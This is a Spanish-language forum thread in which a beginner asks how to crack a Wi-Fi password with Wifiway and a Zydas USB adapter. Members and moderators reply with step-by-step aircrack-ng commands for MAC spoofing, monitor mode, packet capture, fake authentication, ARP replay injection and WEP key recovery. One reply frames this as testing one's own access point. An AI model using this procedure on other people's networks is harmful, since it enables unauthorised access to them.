alvarogemelo

|
 |
« en: 10-Junio 19:52:55 (Domingo) » |
|
Bueno soy novatillo en esto y quisera instalar el wifiway y con la usb zydas poder sacar alguna contraseña pero sin animo de lucro por curiosidad porque a mi stas cosas de vulnerabilidad me gustan mucho pero no se como empezar,no hay algun minitutorial para realizarlo? e visto post pero no tengo ni idea de cuales son los primeros pasos,si debo conecatr el wifiway con la usb metida,que comandos debo poner,que programas usar para la inyeccion y sacar la contraseña(aircrak,zydasinyected..),las librerias si hay que poner alguna,pero es que no se como hacer todo esto bueno la instalacion no habia problema pero eso si una vez en el entrono windows de linux hay ya no se que hacer, me podeis decir los pasos a seguir ahora Si tengo que bajarme algun programilla me lo podriais decir? una vez dentro del wifiway le doy a interent y no me conecta,porque?si en windows si que funciona
Esto es lo que e podido recopilar de informacion : Primero creo que debo poner esto en la consola de comando-->poner ifconfig eth1 down o iwconfig
Otro paso es Cambiar la mac:
ifconfig eth1 down macchanger --mac=00:11:22:33:44:55 eth1 ifconfig eth1 up iwconfig eth1 mode monitor channel el_que_sea rate 1M
Luego Poner el airodump: airodump-ng eth1 -c el_que_sea --bssid MAC_AP -w nombre_fichero_capturas
Y para asociarme: aireplay-ng -0 30 -e ESSID -a MAC_AP -h 00:11:22:33:44:55 eth1
Pero si el nivel de señal no es relativamente bueno, no asocia. Se Puede probar la opción -o que A veces funciona mejor:
aireplay-ng -0 30 -o 1 -e ESSID -a MAC_AP -h 00:11:22:33:44:55 eth1
Alguien me puede orientar? thanks
|
|
|
|
« Última modificación: 10-Junio 20:32:06 (Domingo) por alvarogemelo »
|
|
|
|
|
|
|
|
|
ChimoC
Moderador Global

|
 |
« Respuesta #3 en: 11-Junio 13:32:08 (Lunes) » |
|
Buenas alvarogemelo: Si te das cuenta en el post que te dice hadrianweb, al final observarás que los comandos que estás poniendo están mal, ya que debes cambiar el 0 por un 1 (como bien te ha dicho el jefe  ) Y si no sabes que es un A0 hasta un A5... lo que debes hacer es leer un poco más, y saber que es una desautentificación, asociación falsa, una inyección, un chop-chop... que está ya dicho por el foro. Echa un vistazo aquí.... http://hwagm.elhacker.net/aircrack-ng.htmUn saludo ChimoC
|
|
|
|
|
|
|
|
|
|
|
the_often

|
 |
« Respuesta #5 en: 11-Junio 15:33:01 (Lunes) » |
|
Bueno, a ver, es bueno leer manuales, no sé porqué la gente no lo hace. Para ver tu disco duro tendras que montarlo con el comando mount, y asi ya podras ver su contenido. Tambien se hace igual para leer/escribir en una memoria usb. Como se usa el comando mount?? www.google.es, verás que facil lo encuentras, y te daras cuenta de lo mucho que se puede aprender y que solo es tener un poquito de tiempo y ganas de buscar y de LEER. Un saludo!! 
|
|
|
|
|
|
El cura en misa: "...y dijo Jesús: 'Lázaro, levantate y anda'. Y entonces Lázaro se levantó y andó..."
Y un feligrés le interrumpe: "¡¡ <b>ANDUVO,</b> ATONTAO !!"
El cura continua: "Esto..., bueno sí,.. al principio anduvo un poco atontao..., pero luego andó....."
Jejejeje!
|
|
|
|
|
|
|
|
|
|
|
KeKo

|
 |
« Respuesta #10 en: 11-Junio 16:01:05 (Lunes) » |
|
No hace falta convertirla. Se puede usar en hexadecimal, tanto en windows como con el wifiway. De todas formas el aircrack-ng nuevo, cuando la encuentra, te muestra la clave de ambas formas (hexadecimal y ascii) A mi lo que más me ayudó a empezar fueron los videos que hay en la web del wifislax, que te van poniendo todos los pasos y ver lo que hace cada uno ayuda mucho. Me los vi todos y fuí tomando apuntes, y luego es cambiar un par de cosas (la interfaz y poco más) de lo que sale en los videos. Por cierto, viene muy bien leer el manual del aircrack-ng en su web, que además está en castellano El link: http://www.aircrack-ng.org/doku.php?id=spanish&DokuWiki=ac5e438f8e4328e4dfc81e02b059b929
|
|
|
|
« Última modificación: 11-Junio 16:03:14 (Lunes) por KeKo »
|
|
|
|
|
|
|
KeKo

|
 |
« Respuesta #12 en: 11-Junio 21:31:23 (Lunes) » |
|
Deberías ver los videos y leer el link que te he puesto. Te aclararan prácticamente todo lo que dudas. E estado leyendo los post pero sigo sin aclararme y no tiene que ser tan dificil solo unos pasos pues esto es lo que creo de como se hace
Abrimos una consola Código: mousepad /sys/class/net/wifi0/device/channel-->ME ABRE UNA VENTANA EN BLANCO Importante: El canal AP debe corresponder al mismo canal del router que queremos atacar, eso lo podeis ver cuando ejecutais vuestro sistema operativo y buscais redes wifi.-->ESTO NO SE LO QUE ES PORQUE NO SE COMO VEO SI HAY UNA RED A MI ALCANCE,QUE ES UNA AP Y COMO LO AVERIGUO?
Con "airodump-ng interfaz", sustituyendo interfaz por la tuya, que por lo que pones más arriba en otro post supongo que es eth2. Canal de AP si pones 11 (11 es un ejemplo) normalmente muestra algunos puntos de acceso cuando ejecutes airodump, guardamos y cerramos. Cogemos el BSSID del AP (router)-->QUE ES EL BSSID Y DONDE LO AVERIGUO?
Es la MAC del router y también te la dice el airodump-ng. Código: airodump-ng rtap0-->HACIENDO ESTO NO ME SALE NADA
Pues por que tu interfaz no es rtap0. Para saber tu interfaz usa "iwconfig". Si lo que pones en el post de arriba es correcto, tu interfaz es eth2. Una vez aparezcan los BSSID pulsamos CTRL+C Código: mousepad /sys/class/net/wifi0/device/bssid
Ponemos el BSSID del AP y guardamos pero no cerramos el archivo por lo visto hay incompatibilidades si cerramos. Código: airodump-ng -c CANAL DEL AP -w FICHERO GUARDA IVS rtap0 Abrimos otra consola Código: mousepad /sys/class/net/wifi0/device/rate Lo ponemos a 2, guardamos y cerramos. Código: ifconfig wifi0 up
Código: ifconfig
Cogemos la MAC de tu WIFI0. Los 12 primeros numeros de HWaddr Código: aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Tambien podeis poner Código: aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0
de esta manera se asocia automaticamente cada 10 segundos para aquellos que pillais alguna ARP y luego no suben.
Una vez autentificados abrimos otra consola y ponemos Código: aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0
Esperamos un rato como mucho 15 minutos y vereis como suben los ARP.
El ataque utilizado es el AP1 de falsa autentificacion tambien funciona con el AP0 pero no lo he probado.
Si os pilla alguna ARP pero no sube iros a la consola que tiene el AP1 Código: aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Y lo ejecutais de nuevo hasta que os autentifique o se os suban los ARP.
Sino autentifica fijaros que el RXQ (airodump-ng) esté por encima del 50%.
Por ultimo cuando tengamos mas de 100.000 DATA en airodump-ng ejeuctamos en otra consola. Código: aircrack-ptw FICHERO GUARDA IVS.cap
Al cabo de un rato os saldra KEY FOUND con la clave wep.
Me sigue sin funcionar el internet en wifiway y no se porque y mucho simbolos de mi teclado no corresponden con lo que escribo sobre todo en este simbolo - que en wifiway em sale este /
Hay un post sobre cómo configurar la conexión de internet desde wifiway. Búscalo. Lo del símbolo es porque al arrancar el wifiway escoges mal el juego de símbolos. Cuando te de a elegir durante el arranque, escoje un que dice algo parecido a Spanish ISO no se qué más. Para el resto de cosas (ataques y demás) mírate los videos y el manual del aircrack.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hadrianweb
Aleph-0
Moderador Global

|
 |
« Respuesta #18 en: 12-Junio 15:46:29 (Martes) » |
|
jaja simplemente pon en la terminal airodump-ng interface en donde interface es el nombre que corresponde a tu tarjeta de red wifi. Con eso sabras las redes que tienes cerca. tengo internet a traves del modem de Ono a vetr si asi me decis como me conecto con el a internet como hago para saber con wifiway si tengo una red cerca? siento por ser tan inutil
Una cosa, mirate los videos o lee manuales, ya que sin saber nada, no podemos explicarte paso por paso, seria un rompecabezas para nosotros. Los videos lo dicen todo, puedes encontrarlos aqui http://www.wifislax.com/soporte/videos.html
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ChimoC
Moderador Global

|
 |
« Respuesta #30 en: 13-Junio 15:35:24 (Mircoles) » |
|
Hola alvarogemelo: El A1 (asociación falsa) Esto es que no veas ninguna STATION asociada al BSSID cuando hayas lanzado el airodump aireplay-ng -1 10 -e patata -a 00:14:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX eth2 Donde: -1 significa falsa autenticación 10 tiempo en segundos -e patata es el nombre de la red wireless -a 00:14:XX:XX:XX:XX es la dirección MAC del punto de acceso -h XX:XX:XX:XX:XX:XX es la dirección MAC de NUESTRA tarjeta eth2 es el nombre de la interface wireless (en este caso la tuya, por lo que he visto) EL A3 (inyección) aireplay-ng -3 -b 00:14:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX eth2 Donde: -3 significa reenvio estandard de petición arp (arp request) -b 00:14:XX:XX:XX:XX es la dirección MAC del punto de acceso -h XX:XX:XX:XX:XX:XX es la dirección MAC origen (de un cliente asociado [entonces no haría falta que hicieses el A1] o de una falsa autenticación [cuando has hecho el A1]) eth2 es el nombre de TU interface wireless Y si... abres 4 shells o ventanas... en una cambias la MAC de tu tarjeta (si quieres y si te apetece), en otra lanzas el airodump; en otras lanzas el A1 (siempre y cuando quieras hacer una asociación falsa.. si ves que hay un cliente asociado... pues como que no te haría falta) y en otra lanzas el A3. (el orden sería.... 1º cambio de MAC; 2º airodump; 3º y 4º en principio es indiferente) Con eso NO obtendrías la clave WEP de TU AP.... con eso obtienes DATAS .. el siguiente paso es el aircrack (bien aircrack o bien aircrack-ptw) que lo has de pasar sobre el fichero capturas que te haya generado el airodump-ng...... ¿ok?..... entonces comprobarás la seguridad o inseguridad de TU AP  Un saludo ChimoC
|
|
|
|
« Última modificación: 13-Junio 15:36:57 (Mircoles) por ChimoC »
|
|
|
|
|
|
|